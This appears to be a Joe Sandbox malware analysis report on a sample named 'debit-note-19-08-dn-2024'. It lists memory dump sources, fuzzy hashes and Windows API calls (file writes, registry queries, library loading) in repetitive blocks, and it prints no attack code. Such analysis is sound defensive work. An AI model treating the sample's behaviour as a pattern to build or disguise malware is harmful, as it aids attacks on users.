                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Char$Next$CreateDirectoryPrev
                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 4115351271-2414109610
                                • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                APIs
                                • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$PointerWrite
                                • String ID:
                                • API String ID: 539440098-0
                                • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                  • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                  • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID:
                                • API String ID: 334405425-0
                                • Opcode ID: a26c5c83f9ef2ad83768ff0d809e7d0ff534900b7dfbbf6279fa786ce326c683
                                • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                • Opcode Fuzzy Hash: a26c5c83f9ef2ad83768ff0d809e7d0ff534900b7dfbbf6279fa786ce326c683
                                • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                APIs
                                  • Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C
                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Enum$CloseOpenValue
                                • String ID:
                                • API String ID: 167947723-0
                                • Opcode ID: 08eabb2470022ea022f848a6e11dcf38859f7a65a08fdc0a2d34d61b610d36b3
                                • Instruction ID: 26b43d5caf1540d7dd591319e401bc9d0e282b9307c559b8fc2f3b6a2f24773f
                                • Opcode Fuzzy Hash: 08eabb2470022ea022f848a6e11dcf38859f7a65a08fdc0a2d34d61b610d36b3
                                • Instruction Fuzzy Hash: 31F0D1B1A04204AFEB148FA5DE88EBF767CEF80358F10483EF001A21C0D2B85D419B3A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: EnumErrorLastWindows
                                • String ID:
                                • API String ID: 14984897-0
                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                APIs
                                  • Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1a9fe0657147e393f528c99050b99d89897384afc5368568bb5e959df579fbef
                                • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                • Opcode Fuzzy Hash: 1a9fe0657147e393f528c99050b99d89897384afc5368568bb5e959df579fbef
                                • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                APIs
                                  • Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CloseDeleteOpenValue
                                • String ID:
                                • API String ID: 849931509-0
                                • Opcode ID: bd7eda068c5a8c487db824b3b1be550dc0b42a90544fb6549d002859b4f80231
                                • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                • Opcode Fuzzy Hash: bd7eda068c5a8c487db824b3b1be550dc0b42a90544fb6549d002859b4f80231
                                • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 1e38a0853b33b15907667b679b343be273cdd0c0ce8fe50ce9f9d5bc537c9385
                                • Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
                                • Opcode Fuzzy Hash: 1e38a0853b33b15907667b679b343be273cdd0c0ce8fe50ce9f9d5bc537c9385
                                • Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28
                                APIs
                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
